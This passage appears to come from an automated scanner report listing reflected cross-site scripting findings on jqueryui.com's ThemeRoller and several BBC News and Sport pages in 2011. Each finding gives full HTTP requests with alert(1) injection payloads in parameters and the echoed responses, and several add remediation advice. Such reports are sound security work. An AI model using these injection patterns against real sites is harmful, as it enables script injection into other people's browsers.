This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=305be49"><script>alert(1)</script>a6f58046687&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=305be49"><script>alert(1)</script>a6f58046687&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all
...[SNIP]...

3.70. http://jqueryui.com/themeroller/ [opacityShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54d46"><script>alert(1)</script>95af9515bdf was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=3054d46"><script>alert(1)</script>95af9515bdf&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=3054d46"><script>alert(1)</script>95af9515bdf&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.71. http://jqueryui.com/themeroller/ [thicknessShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1420"><script>alert(1)</script>4061fcc75d1 was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxe1420"><script>alert(1)</script>4061fcc75d1&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxe1420"><script>alert(1)</script>4061fcc75d1&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.72. http://news.bbc.co.uk/2/hi/programmes/from_our_own_correspondent/9538059.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /2/hi/programmes/from_our_own_correspondent/9538059.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3913a'-alert(1)-'50c36c6e4b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/hi/programmes/from_our_own_correspondent/9538059.stm?3913a'-alert(1)-'50c36c6e4b3=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:28 GMT
Keep-Alive: timeout=5, max=798
Expires: Mon, 18 Jul 2011 02:19:28 GMT
Connection: close
Content-Length: 65871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955568000,
       editionToServe: 'international',
       queryString: '3913a'-alert(1)-'50c36c6e4b3=1',
       referrer: null,
       section: null,
       sectionPath: '/programmes/from_our_own_correspondent',
       siteName: null,
       siteToServe: 'news',
       siteVersion: '4',
       storyId: '9538059',
       assetType:
...[SNIP]...

3.73. http://news.bbc.co.uk/go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6be63'-alert(1)-'34341b078d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm?6be63'-alert(1)-'34341b078d2=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:14 GMT
Keep-Alive: timeout=5, max=800
Expires: Mon, 18 Jul 2011 02:20:14 GMT
Connection: close
Content-Length: 66244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955614000,
       editionToServe: 'international',
       queryString: '6be63'-alert(1)-'34341b078d2=1',
       referrer: null,
       section: null,
       sectionPath: '/programmes/from_our_own_correspondent',
       siteName: null,
       siteToServe: 'news',
       siteVersion: '4',
       storyId: '9538059',
       assetType:
...[SNIP]...

3.74. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cycling/14179023.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/cycling/14179023.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de8b7'-alert(1)-'8f07b21810e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/cycling/14179023.stm?de8b7'-alert(1)-'8f07b21810e=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:56 GMT
Keep-Alive: timeout=5, max=781
Expires: Mon, 18 Jul 2011 02:19:56 GMT
Connection: close
Content-Length: 57158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955596000,
       editionToServe: 'international',
       queryString: 'de8b7'-alert(1)-'8f07b21810e=1',
       referrer: null,
       section: 'cycling',
       sectionPath: '/cycling',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14179023',
       assetType: 'story',
       u
...[SNIP]...

3.75. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/14168601.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/football/14168601.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ff46'-alert(1)-'6db5909d807 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/football/14168601.stm?6ff46'-alert(1)-'6db5909d807=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:47 GMT
Keep-Alive: timeout=5, max=778
Expires: Mon, 18 Jul 2011 02:19:47 GMT
Connection: close
Content-Length: 50930

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955587000,
       editionToServe: 'international',
       queryString: '6ff46'-alert(1)-'6db5909d807=1',
       referrer: null,
       section: 'women',
       sectionPath: '/football',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14168601',
       assetType: 'story',
       ur
...[SNIP]...

3.76. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/golf/14178214.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/golf/14178214.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1f63'-alert(1)-'818a96bc794 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/golf/14178214.stm?f1f63'-alert(1)-'818a96bc794=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:48 GMT
Keep-Alive: timeout=5, max=707
Expires: Mon, 18 Jul 2011 02:19:48 GMT
Connection: close
Content-Length: 56401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955588000,
       editionToServe: 'international',
       queryString: 'f1f63'-alert(1)-'818a96bc794=1',
       referrer: null,
       section: 'golf',
       sectionPath: '/golf',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14178214',
       assetType: 'story',
       uri: '/
...[SNIP]...

3.77. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/motogp/14177052.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/motogp/14177052.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bb38'-alert(1)-'e4c57ec748a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/motogp/14177052.stm?8bb38'-alert(1)-'e4c57ec748a=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:53 GMT
Keep-Alive: timeout=5, max=788
Expires: Mon, 18 Jul 2011 02:19:53 GMT
Connection: close
Content-Length: 53436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955593000,
       editionToServe: 'international',
       queryString: '8bb38'-alert(1)-'e4c57ec748a=1',
       referrer: null,
       section: 'motorbikes',
       sectionPath: '/motogp',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14177052',
       assetType: 'story',
   
...[SNIP]...

3.78. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afea3'-alert(1)-'0f35a49d629 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm?afea3'-alert(1)-'0f35a49d629=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:56 GMT
Keep-Alive: timeout=5, max=761
Expires: Mon, 18 Jul 2011 02:19:56 GMT
Connection: close
Content-Length: 49288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955596000,
       editionToServe: 'international',
       queryString: 'afea3'-alert(1)-'0f35a49d629=1',
       referrer: null,
       section: 'welsh',
       sectionPath: '/rugby_union/welsh',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14175299',
       assetType: 'stor
...[SNIP]...

3.79. http://news.bbc.co.uk/sport2/hi/cycling/14179023.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/cycling/14179023.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5709f'-alert(1)-'96343706a0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/cycling/14179023.stm?5709f'-alert(1)-'96343706a0b=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:34 GMT
Keep-Alive: timeout=5, max=793
Expires: Mon, 18 Jul 2011 02:20:34 GMT
Connection: close
Content-Length: 57234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955634000,
       editionToServe: 'international',
       queryString: '5709f'-alert(1)-'96343706a0b=1',
       referrer: null,
       section: 'cycling',
       sectionPath: '/cycling',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14179023',
       assetType: 'story',
       u
...[SNIP]...

3.80. http://news.bbc.co.uk/sport2/hi/football/14168601.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/football/14168601.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3339d'-alert(1)-'a2a06505956 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/football/14168601.stm?3339d'-alert(1)-'a2a06505956=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:41 GMT
Keep-Alive: timeout=5, max=785
Expires: Mon, 18 Jul 2011 02:19:41 GMT
Connection: close
Content-Length: 51951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955581000,
       editionToServe: 'international',
       queryString: '3339d'-alert(1)-'a2a06505956=1',
       referrer: null,
       section: 'women',
       sectionPath: '/football',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14168601',
       assetType: 'story',
       ur
...[SNIP]...

3.81. http://news.bbc.co.uk/sport2/hi/golf/14178214.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/golf/14178214.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b3d9'-alert(1)-'2c218cf9b1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/golf/14178214.stm?5b3d9'-alert(1)-'2c218cf9b1c=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:08 GMT
Keep-Alive: timeout=5, max=741
Expires: Mon, 18 Jul 2011 02:20:08 GMT
Connection: close
Content-Length: 56401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955608000,
       editionToServe: 'international',
       queryString: '5b3d9'-alert(1)-'2c218cf9b1c=1',
       referrer: null,
       section: 'golf',
       sectionPath: '/golf',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14178214',
       assetType: 'story',
       uri: '/
...[SNIP]...

3.82. http://news.bbc.co.uk/sport2/hi/motogp/14177052.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/motogp/14177052.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0774'-alert(1)-'96258bdb8b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/motogp/14177052.stm?b0774'-alert(1)-'96258bdb8b3=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
